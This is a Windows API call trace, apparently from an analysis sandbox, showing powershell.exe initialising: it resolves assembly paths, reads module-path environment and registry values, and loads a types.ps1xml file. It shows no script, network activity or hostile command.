	[0621.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d8d0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.964] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d820, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d920, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.969] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0621.970] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", nBufferLength=0x105, lpBuffer=0x12d870, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\Microsoft.PowerShell.ConsoleHost\\1.0.0.0__31bf3856ad364e35\\Microsoft.PowerShell.ConsoleHost.dll", lpFilePart=0x0) returned 0x7c
	[0622.993] CreateEventW (lpEventAttributes=0x0, bManualReset=1, bInitialState=0, lpName=0x0) returned 0x31c
	[0622.995] CoCreateGuid (in: pguid=0x12def0 | out: pguid=0x12def0*(Data1=0x1d3a2a4, Data2=0x1aae, Data3=0x44b6, Data4=([0]=0xab, [1]=0x22, [2]=0x76, [3]=0x79, [4]=0xf7, [5]=0x9, [6]=0x14, [7]=0xc))) returned 0x0
	[0622.996] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0622.996] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0622.996] CoTaskMemFree (pv=0x31a0f0) 
	[0623.006] WinSqmIsOptedIn () returned 0x0
	[0623.007] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.007] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.007] CoTaskMemFree (pv=0x31a0f0) 
	[0623.008] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.008] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.008] CoTaskMemFree (pv=0x31a0f0) 
	[0623.009] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.009] CoTaskMemFree (pv=0x31a0f0) 
	[0623.009] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.009] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.009] CoTaskMemFree (pv=0x31a0f0) 
	[0623.010] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.010] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.010] CoTaskMemFree (pv=0x31a0f0) 
	[0623.011] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.011] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.011] CoTaskMemFree (pv=0x31a0f0) 
	[0623.012] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.012] CoTaskMemFree (pv=0x31a0f0) 
	[0623.012] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.012] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.013] CoTaskMemFree (pv=0x31a0f0) 
	[0623.015] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.015] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.015] CoTaskMemFree (pv=0x31a0f0) 
	[0623.019] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.019] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.019] CoTaskMemFree (pv=0x31a0f0) 
	[0623.019] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.020] CoTaskMemFree (pv=0x31a0f0) 
	[0623.020] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0623.020] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0623.020] CoTaskMemFree (pv=0x31a0f0) 
	[0626.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0626.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0626.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0626.883] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.465] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.466] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.467] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d340, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.468] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x12d290, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0628.470] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0628.470] GetEnvironmentVariableW (in: lpName="PSMODULEPATH", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x33
	[0628.470] CoTaskMemFree (pv=0x31a0f0) 
	[0628.472] CoTaskMemAlloc (cb=0xcc) returned 0x1b7a1620
	[0628.472] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7a1620, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0628.472] CoTaskMemFree (pv=0x1b7a1620) 
	[0628.473] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="System\\CurrentControlSet\\Control\\Session Manager\\Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12da68 | out: phkResult=0x12da68*=0x2e8) returned 0x0
	[0628.473] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d9ec, lpData=0x0, lpcbData=0x12d9e8*=0x0 | out: lpType=0x12d9ec*=0x2, lpData=0x0, lpcbData=0x12d9e8*=0x6c) returned 0x0
	[0628.473] CoTaskMemAlloc (cb=0x70) returned 0x2a13e0
	[0628.473] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d9bc, lpData=0x2a13e0, lpcbData=0x12d9b8*=0x6c | out: lpType=0x12d9bc*=0x2, lpData="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpcbData=0x12d9b8*=0x6c) returned 0x0
	[0628.473] CoTaskMemFree (pv=0x2a13e0) 
	[0628.473] CoTaskMemAlloc (cb=0xcc) returned 0x1b7a1620
	[0628.473] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%", lpDst=0x1b7a1620, nSize=0x64 | out: lpDst="C:\\Windows") returned 0xb
	[0628.473] CoTaskMemFree (pv=0x1b7a1620) 
	[0628.473] CoTaskMemAlloc (cb=0xcc) returned 0x1b7a1620
	[0628.473] ExpandEnvironmentStringsW (in: lpSrc="%SystemRoot%\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7a1620, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0628.473] CoTaskMemFree (pv=0x1b7a1620) 
	[0628.477] RegCloseKey (hKey=0x2e8) returned 0x0
	[0628.477] CoTaskMemAlloc (cb=0xcc) returned 0x1b7a1620
	[0628.477] ExpandEnvironmentStringsW (in: lpSrc="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\", lpDst=0x1b7a1620, nSize=0x64 | out: lpDst="C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 0x34
	[0628.477] CoTaskMemFree (pv=0x1b7a1620) 
	[0628.477] RegOpenKeyExW (in: hKey=0xffffffff80000001, lpSubKey="Environment", ulOptions=0x0, samDesired=0x20019, phkResult=0x12da68 | out: phkResult=0x12da68*=0x2e8) returned 0x0
	[0628.477] RegQueryValueExW (in: hKey=0x2e8, lpValueName="PSMODULEPATH", lpReserved=0x0, lpType=0x12d9ec, lpData=0x0, lpcbData=0x12d9e8*=0x0 | out: lpType=0x12d9ec*=0x0, lpData=0x0, lpcbData=0x12d9e8*=0x0) returned 0x2
	[0628.477] RegCloseKey (hKey=0x2e8) returned 0x0
	[0629.418] CoTaskMemAlloc (cb=0x20c) returned 0x303380
	[0629.419] SHGetFolderPathW (in: hwnd=0x0, csidl=5, hToken=0x0, dwFlags=0x0, pszPath=0x303380 | out: pszPath="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents") returned 0x0
	[0629.420] CoTaskMemFree (pv=0x303380) 
	[0629.420] GetFullPathNameW (in: lpFileName="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", nBufferLength=0x105, lpBuffer=0x12d5f0, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents", lpFilePart=0x0) returned 0x27
	[0629.421] SetEnvironmentVariableW (lpName="PSMODULEPATH", lpValue="C:\\Users\\5p5NrGJn0jS HALPmcxz\\Documents\\WindowsPowerShell\\Modules;C:\\Windows\\system32\\WindowsPowerShell\\v1.0\\Modules\\") returned 1
	[0629.426] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0629.426] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.426] CoTaskMemFree (pv=0x31a0f0) 
	[0629.428] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0629.428] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.428] CoTaskMemFree (pv=0x31a0f0) 
	[0629.438] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0629.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.438] CoTaskMemFree (pv=0x31a0f0) 
	[0629.438] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0629.438] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.438] CoTaskMemFree (pv=0x31a0f0) 
	[0629.440] RegOpenKeyExW (in: hKey=0xffffffff80000002, lpSubKey="SOFTWARE\\Microsoft\\PowerShell\\1\\ShellIds\\Microsoft.PowerShell", ulOptions=0x0, samDesired=0x20019, phkResult=0x12d858 | out: phkResult=0x12d858*=0x320) returned 0x0
	[0629.440] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x12d86c, lpData=0x0, lpcbData=0x12d868*=0x0 | out: lpType=0x12d86c*=0x1, lpData=0x0, lpcbData=0x12d868*=0x74) returned 0x0
	[0629.441] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x12d7dc, lpData=0x0, lpcbData=0x12d7d8*=0x0 | out: lpType=0x12d7dc*=0x1, lpData=0x0, lpcbData=0x12d7d8*=0x74) returned 0x0
	[0629.441] CoTaskMemAlloc (cb=0x78) returned 0x2a13e0
	[0629.441] RegQueryValueExW (in: hKey=0x320, lpValueName="path", lpReserved=0x0, lpType=0x12d7ac, lpData=0x2a13e0, lpcbData=0x12d7a8*=0x74 | out: lpType=0x12d7ac*=0x1, lpData="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe", lpcbData=0x12d7a8*=0x74) returned 0x0
	[0629.441] CoTaskMemFree (pv=0x2a13e0) 
	[0629.441] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", nBufferLength=0x105, lpBuffer=0x12d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0", lpFilePart=0x0) returned 0x2a
	[0629.441] SetErrorMode (uMode=0x1) returned 0x1
	[0629.441] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0"), fInfoLevelId=0x0, lpFileInformation=0x12d730 | out: lpFileInformation=0x12d730*(dwFileAttributes=0x10, ftCreationTime.dwLowDateTime=0x80093051, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x1dba44b2, ftLastAccessTime.dwHighDateTime=0x1cbf8ea, ftLastWriteTime.dwLowDateTime=0x1dba44b2, ftLastWriteTime.dwHighDateTime=0x1cbf8ea, nFileSizeHigh=0x0, nFileSizeLow=0x1000)) returned 1
	[0629.441] SetErrorMode (uMode=0x1) returned 0x1
	[0629.442] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d520, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0629.442] SetErrorMode (uMode=0x1) returned 0x1
	[0629.442] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d730 | out: lpFileInformation=0x12d730*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0629.442] SetErrorMode (uMode=0x1) returned 0x1
	[0629.443] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0629.443] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.443] CoTaskMemFree (pv=0x31a0f0) 
	[0629.445] CoTaskMemAlloc (cb=0x104) returned 0x31a0f0
	[0629.445] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x31a0f0, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0629.445] CoTaskMemFree (pv=0x31a0f0) 
	[0629.450] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d0e0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0629.450] SetErrorMode (uMode=0x1) returned 0x1
	[0629.451] CreateFileW (lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x8100000, hTemplateFile=0x0) returned 0x324
	[0629.451] GetFileType (hFile=0x324) returned 0x1
	[0629.451] SetErrorMode (uMode=0x1) returned 0x1
	[0629.451] GetFileType (hFile=0x324) returned 0x1
	[0630.295] ReadFile (in: hFile=0x324, lpBuffer=0x2dc98e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2dc98e8*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0630.299] ReadFile (in: hFile=0x324, lpBuffer=0x2dc98e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2dc98e8*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0630.300] ReadFile (in: hFile=0x324, lpBuffer=0x2dc98e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2dc98e8*, lpNumberOfBytesRead=0x12d668*=0x1000, lpOverlapped=0x0) returned 1
	[0630.301] ReadFile (in: hFile=0x324, lpBuffer=0x2dc98e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2dc98e8*, lpNumberOfBytesRead=0x12d668*=0xcf3, lpOverlapped=0x0) returned 1
	[0630.301] ReadFile (in: hFile=0x324, lpBuffer=0x2dc8d43, nNumberOfBytesToRead=0x30d, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2dc8d43*, lpNumberOfBytesRead=0x12d668*=0x0, lpOverlapped=0x0) returned 1
	[0630.301] ReadFile (in: hFile=0x324, lpBuffer=0x2dc98e8, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x12d668, lpOverlapped=0x0 | out: lpBuffer=0x2dc98e8*, lpNumberOfBytesRead=0x12d668*=0x0, lpOverlapped=0x0) returned 1
	[0630.303] CloseHandle (hObject=0x324) returned 1
	[0630.308] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d380, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
	[0630.309] SetErrorMode (uMode=0x1) returned 0x1
	[0630.309] GetFileAttributesExW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml" (normalized: "c:\\windows\\system32\\windowspowershell\\v1.0\\getevent.types.ps1xml"), fInfoLevelId=0x0, lpFileInformation=0x12d5e0 | out: lpFileInformation=0x12d5e0*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x67d6d2bb, ftCreationTime.dwHighDateTime=0x1ca03f8, ftLastAccessTime.dwLowDateTime=0x67d6d2bb, ftLastAccessTime.dwHighDateTime=0x1ca03f8, ftLastWriteTime.dwLowDateTime=0xe8e83beb, ftLastWriteTime.dwHighDateTime=0x1c9ea0b, nFileSizeHigh=0x0, nFileSizeLow=0x3cf3)) returned 1
	[0630.309] SetErrorMode (uMode=0x1) returned 0x1
	[0630.310] GetFullPathNameW (in: lpFileName="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", nBufferLength=0x105, lpBuffer=0x12d310, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\GetEvent.types.ps1xml", lpFilePart=0x0) returned 0x40
